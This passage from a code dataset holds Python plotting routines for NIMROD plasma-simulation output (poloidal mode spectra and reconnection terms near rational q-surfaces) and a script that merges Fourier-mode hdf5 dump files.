fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def plot_scalar(self,rr,zz,field):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(rr,zz,field,corner_mask=False)\n plt.show()\n\n @staticmethod\n def phase_shift(array,shift):\n array=array-shift\n array=np.where(array<-np.pi,array+np.pi,array)\n array=np.where(array>np.pi,array-np.pi,array)\n return array\n\n @staticmethod\n def phase_shift2(fcos,fsin,phase):\n ncosphase=np.cos(-phase)\n nsinphase=np.sin(-phase)\n inphase=fcos*ncosphase-fsin*nsinphase\n outphase=fcos*nsinphase+fsin*ncosphase\n return inphase,outphase\n\n def plot_fsa(self, key=None, **kwargs):\n qlist=[-2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n print(phase_21)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$ amplitude\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb/s]',fontsize=fontsize)\n ax.plot(self.rhon,self.bmn_amp[0,3,:]*1000, color=tc)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.show()\n\n if key is None:\n for ikey in self.interp_dict:\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n #'amp'\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,self.this_amp[0,3,:])\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n else:\n pass\n return None\n\n\n def plot_fsa_phase(self, key=None, **kwargs):\n qlist=[-1.5,-2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n sumlist=['etajpert','divpie']\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n binphase,boutphase=self.phase_shift2(self.bcmn[0,3,:],self.bsmn[0,3,:],phase_21)\n print(phase_21)\n\n if \"time\" in kwargs:\n tmp=kwargs[\"time\"]\n time_str = f\" at {tmp*1000:.1f} ms\"\n else:\n time_str=\"\"\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{m/1}|$ [mWb]',fontsize=fontsize)\n thisamp=np.sqrt(np.square(self.bcmn)+np.square(self.bsmn))\n ax.plot(self.rhon,thisamp[0,4,:]*1000,color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,thisamp[0,3,:]*1000,color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,thisamp[0,2,:]*1000,color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,thisamp[0,1,:]*1000,color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n vxb_inphase = np.zeros(self.bmn_amp.shape)\n vxb_outphase = np.zeros(self.bmn_amp.shape)\n for ikey in ['vpbeq','veqbp','vpbp']: #veqbeq is not calculated\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n vxb_inphase+=this_in\n vxb_outphase+=this_out\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\nabla \\times \\left(\\vec v \\times \\vec b\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n ax.plot(self.rhon,vxb_inphase[0,4,:],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,vxb_inphase[0,3,:],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,vxb_inphase[0,2,:],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,vxb_inphase[0,1,:],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n reconnect_inphase = np.zeros(self.bmn_amp.shape)\n reconnect_outphase = np.zeros(self.bmn_amp.shape)\n for ikey in ['etajpert','divpie']:\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n reconnect_inphase+=this_in\n reconnect_outphase+=this_out\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"-$\\nabla \\times \\left(\\eta J + \\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n ax.plot(self.rhon,reconnect_inphase[0,4,:],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon,reconnect_inphase[0,3,:],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon,reconnect_inphase[0,2,:],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon,reconnect_inphase[0,1,:],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.1f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.show()\n\n rhomin=0.5\n rhomax=0.8\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"-$\\nabla \\times \\left(\\eta J + \\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{m/n}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'In phase component [Wb/s]',fontsize=fontsize)\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,4,range],color=colorlist[4],label=r\"$m=-1$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],color=colorlist[1],label=r\"$m=-2$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,2,range],color=colorlist[2],label=r\"$m=-3$\")\n ax.plot(self.rhon[range],reconnect_inphase[0,1,range],color=colorlist[3],label=r\"$m=-4$\")\n ax.axhline(0,ls='-',color='k')\n\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n\n plt.legend(ncol=2,fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xlim(rhomin,rhomax)\n plt.tight_layout()\n plt.show()\n\n\n\n eta_cosmn,eta_sinmn,eta_amp,eta_phase=self.interp_dict['etajpert']\n eta_in,eta_out=self.phase_shift2(eta_cosmn,eta_sinmn,phase_21)\n divpie_cosmn,divpie_sinmn,divpie_amp,divpie_phase=self.interp_dict['divpie']\n divpie_in,divpie_out=self.phase_shift2(divpie_cosmn,divpie_sinmn,phase_21)\n\n\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n# plt.text(irho*.985,-4,'q=-2',rotation=90,color=tc,fontsize=fontsize)\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta \\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.axhline(0,ls='-',color='k')\n\n\n\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xlim(rhomin,rhomax)\n plt.tight_layout()\n plt.show()\n\n #rhomin=0.60\n #rhomax=0.85\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta \\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.plot(self.rhon[range],vxb_inphase[0,3,range],label=r\"$\\delta \\psi_{VB}$\",color=colorlist[4])\n ax.axhline(0,ls='-',color='k')\n\n\n\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n #rhomin=0.60\n #rhomax=0.8\n fig= plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\delta \\psi_{-2/1}$\"+time_str,fontsize=fontsize)\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'Re $\\delta \\psi$ [Wb/s]',fontsize=fontsize)\n irho = self.get_rho_q(-2)\n qlbl = f\"q = {-2:.1f}\"\n tc=colorlist[1]\n ax.axvline(irho,ls=':',color=tc,label=\"q=-2.0\")\n range=np.where((self.rhon>rhomin) & (self.rhon<rhomax))[0]\n ax.plot(self.rhon[range],reconnect_inphase[0,3,range],label=r\"$\\delta \\psi_{rec}$\",color=colorlist[0])\n ax.plot(self.rhon[range],eta_in[0,3,range],label=r\"$\\delta \\psi_{\\eta} $\",color=colorlist[2])\n ax.plot(self.rhon[range],divpie_in[0,3,range],label=r\"$\\delta \\psi_{\\pi_e}$\",color=colorlist[3])\n ax.plot(self.rhon[range],vxb_inphase[0,3,range],label=r\"$\\delta \\psi_{VB}$\",color=colorlist[4])\n ax.axhline(0,ls='-',color='k')\n plt.legend(fontsize=fontsize,loc=2,frameon=True,handlelength=.75,handletextpad=0.3)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.ylim(-3,3)\n plt.tight_layout()\n plt.show()\n\n\n\n return None\n\n def plot_fsa_phase_old(self, key=None, **kwargs):\n qlist=[-1.5, -2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde B\\right)_{2/1}$\"\n titledict['etajpert']=r\"$\\nabla \\times \\left(\\eta \\tilde J\\right)_{2/1}$\"\n titledict['divpie']=r\"$\\nabla \\times \\left(\\frac{1}{ne}\\nabla \\cdot \\pi_e\\right)_{2/1}$\"\n sumlist=['etajpert','divpie']\n phase_21=interp1d(self.rhon,self.bmn_phase[0,3,:], kind='linear')(self.get_rho_q(-2))\n binphase,boutphase=self.phase_shift2(self.bcmn[0,3,:],self.bsmn[0,3,:],phase_21)\n print(phase_21)\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb]',fontsize=fontsize)\n #ax.plot(self.rhon,self.bmn_amp[0,0,:]*1000,label='amp 0')\n #ax.plot(self.rhon,self.bmn_amp[0,1,:]*1000,label='amp 1')\n #ax.plot(self.rhon,self.bmn_amp[0,2,:]*1000,label='amp 2')\n ax.scatter(self.dvar_dict['rhon'],self.raw_bmn_amp[0,3,:]*1000,label='amp 3')\n plt.show()\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n tc=colorlist[0%len(colorlist)]\n plt.title(r\"$\\psi_{2/1}$\")\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|\\psi_{2/1}|$ [mWb]',fontsize=fontsize)\n #ax.plot(self.rhon,self.bmn_amp[0,0,:]*1000,label='amp 0')\n #ax.plot(self.rhon,self.bmn_amp[0,1,:]*1000,label='amp 1')\n #ax.plot(self.rhon,self.bmn_amp[0,2,:]*1000,label='amp 2')\n ax.plot(self.rhon,self.bmn_amp[0,3,:]*1000,label='amp 3')\n #ax.plot(self.rhon,self.bmn_amp[0,4,:]*1000,label='amp 4')\n #ax.plot(self.rhon,self.bmn_amp[0,5,:]*1000,label='amp 5')\n #ax.plot(self.rhon,self.bmn_amp[0,6,:]*1000,label='amp 6')\n #ax.plot(self.rhon,self.bmn_amp[0,7,:]*1000,label='amp 7')\n #ax.plot(self.rhon,self.bmn_amp[0,8,:]*1000,label='amp 8')\n #ax.plot(self.rhon,self.bmn_amp[0,9,:]*1000,label='amp 9')\n\n ax.plot(self.rhon,binphase*1000,label='in phase')\n ax.plot(self.rhon,boutphase*1000,label='90 out of phase')\n plt.legend()\n ax.axhline(0,ls='-',color='k')\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.show()\n\n in_sum = np.zeros(self.bmn_amp.shape)\n out_sum = np.zeros(self.bmn_amp.shape)\n if key is None:\n for ikey in self.interp_dict:\n print(ikey)\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n if ikey in sumlist:\n in_sum+=this_in\n out_sum+=this_out\n #amp\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,0,:],label='amp')\n plt.plot(self.rhon,this_in[0,0,:],label='in phase')\n plt.plot(self.rhon,this_out[0,0,:], label='90 out of phase')\n plt.plot(self.rhon,this_amp[0,1,:],label='amp')\n plt.plot(self.rhon,this_in[0,1,:],label='in phase')\n plt.plot(self.rhon,this_out[0,1,:], label='90 out of phase')\n plt.plot(self.rhon,this_amp[0,2,:],label='amp')\n plt.plot(self.rhon,this_in[0,2,:],label='in phase')\n plt.plot(self.rhon,this_out[0,2,:], label='90 out of phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n ikey='divpie'\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,3,:],label='amp')\n plt.plot(self.rhon,this_in[0,3,:],label='in phase')\n plt.plot(self.rhon,this_out[0,3,:], label='90 out of phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n ikey='etajpert'\n this_cosmn,this_sinmn,this_amp,this_phase=self.interp_dict[ikey]\n this_in,this_out=self.phase_shift2(this_cosmn,this_sinmn,phase_21)\n plt.title(titledict.get(ikey,ikey))\n plt.plot(self.rhon,this_amp[0,3,:],label='amp')\n plt.plot(self.rhon,this_in[0,3,:],label='in phase')\n plt.plot(self.rhon,this_out[0,3,:], label='90 out of phase')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n ax.axhline(0,ls='-',color='k')\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.title(r\"$\\nabla \\times \\left(\\eta \\tilde j + \\frac{1}{ne}\\nabla \\cdot \\Pi_e\\right)$\" )\n plt.plot(self.rhon,np.sqrt(np.square(in_sum[0,3,:])+np.square(out_sum[0,3,:])),label='amp')\n plt.plot(self.rhon,in_sum[0,3,:],label='in phase')\n plt.plot(self.rhon,out_sum[0,3,:],label='90 out of phase')\n ax.axhline(0,ls='-',color='k')\n plt.xlabel(r'$\\rho_N$',fontsize=fontsize)\n plt.ylabel(r'$|F_{m/n}|$ [Wb/s]',fontsize=fontsize)\n plt.ylim(-50,50)\n plt.legend()\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(\"q not found\")\n plt.tight_layout()\n plt.show()\n\n return None\n" }, { "alpha_fraction": 0.5817040801048279, "alphanum_fraction": 0.6111513376235962, "avg_line_length": 34.7068977355957, "blob_id": "1bdf09c1f5de2d9dd9ec56c8f102ade543834045", "content_id": "1e6ff8c278e24600bd7c48d8be03a46d9860dc8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4143, "license_type": "no_license", "max_line_length": 213, "num_lines": 116, "path": "/combineDump/combineMultipleDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# firstDump - hdf5 dump file with equilibrium and first nk perturbation\n# secondDump - hdf5 dump file with last nk perturbation\n# Ouput file:\n# finalDump -hdf5 dump file that has combines the perturbed fourier nmodes\n# from each dump file\n# I assume that the is no overlap in keff\nimport os\nimport h5py\nfrom itertools import product\nimport numpy as np\nimport sys\nhomeDir = os.environ['HOME']\n\n#begin user inputs\n\nbasePath = homeDir +'/SCRATCH/166439/03300_q104_reorder_combine/S7Pr1e2/'\n\ndumpList=[]\nfor n in range(11):\n tempFile = 'n'+str(n)+'/dumpglln'+str(n)+'.h5'\n dumpList.append(tempFile)\n\n#dumpList = ['n0/dumpglln0.h5','n1/dumpglln1.h5','n2/dumpglln2.h5','n3/dumpglln3.h5','n4/dumpglln4.h5','n5/dumpglln5.h5','n6/dumpglln6.h5','n7/dumpglln7.h5','n8/dumpglln8.h5','n9/dumpglln9.h5','n10/dumpglln10.h5']\n\nfinalDump = basePath+'n0-10/dumpgll_lphi5.h5'\nnewStep=0\nnewTime=0.0\n\n#end of inputs\nveList = [ 'bq' , 'diff', 'jq', 'nq', 'peq', 'prq', 'rz', 'vq', 'psi_eq']\nvvList = [ 'imbe', 'imve', 'rebe', 'reve']\n\nvsList = [ 'imconc', 'imnd', 'impe', 'impr', 'imte', 'imti', \\\n 'reconc', 'rend', 'repe', 'repr', 'rete', 'reti' ]\n\nfileList = []\nnkList = []\nkStart=[]\nnmodes=0\n\nfc = h5py.File(finalDump, 'w') \n\nfor id, dumpFile in enumerate(dumpList):\n fileList.append(h5py.File(basePath+dumpFile, 'r'))\n kStart.append(nmodes)\n thisK=fileList[id]['keff'].size\n nmodes+=thisK\n nkList.append(thisK)\n\n\n# reset time and step\nfileList[0].copy(fileList[0]['dumpTime'], fc)\nfc['dumpTime'].attrs.modify('vsStep',newStep)\nfc['dumpTime'].attrs.modify('vsTime',newTime)\n\nnewKeff = np.zeros(nmodes)\nfor id in range(len(fileList)):\n for ii in range(nkList[id]):\n newKeff[kStart[id]+ii]=fileList[id]['keff'][ii]\nfc.create_dataset('keff', data=newKeff)\nfc.copy(fileList[0]['seams'],fc)\nfor aname, avalue in fileList[0].attrs.items():\n fc.attrs[aname] = avalue \nfc.attrs['nmodes'] = nmodes\n\nfc.create_group('rblocks')\nfor aname, avalue in fileList[0]['rblocks'].attrs.items():\n fc['rblocks'].attrs[aname] = avalue \nfor re in fileList[0]['rblocks'].keys():\n print('Processing rblock '+re)\n sys.stdout.flush()\n gList=[]\n for id in range(len(fileList)):\n gList.append(fileList[id]['rblocks/'+re])\n gc = fc.create_group('rblocks/'+re)\n for aname, avalue in gList[0].attrs.items():\n gc.attrs[aname] = avalue\n gc.attrs['nfour'] = nmodes\n\n for d1key, d1value in gList[0].items():\n print('Processing '+d1key)\n sys.stdout.flush()\n# copy eq fieds from first dumpfile\n if d1key.startswith(tuple(veList)):\n gc.create_dataset(d1key, data=d1value)\n for aname, avalue in gList[0][d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n continue\n if not(d1key.startswith(tuple(vsList+vvList))):\n print(\"Unreconized key: \"+d1key)\n continue\n dsvalue=np.zeros([d1value.shape[0],d1value.shape[1],nmodes])\n dvvalue=np.zeros([d1value.shape[0],d1value.shape[1],3*nmodes])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n if(d1key.startswith(tuple(vsList))): #scalar field\n for id in range(len(fileList)):\n dvalue=gList[id][d1key][:]\n for nn in range(nkList[id]):\n dsvalue[iv,jv,nn+kStart[id]]=dvalue[iv][jv][nn] \n else: #vector field\n for id in range(len(fileList)):\n dvalue=gList[id][d1key][:]\n for nn in range(nkList[id]):\n dvvalue[iv,jv,3*(nn+kStart[id])]=dvalue[iv][jv][3*nn]\n dvvalue[iv,jv,3*(nn+kStart[id])+1]=dvalue[iv][jv][3*nn+1]\n 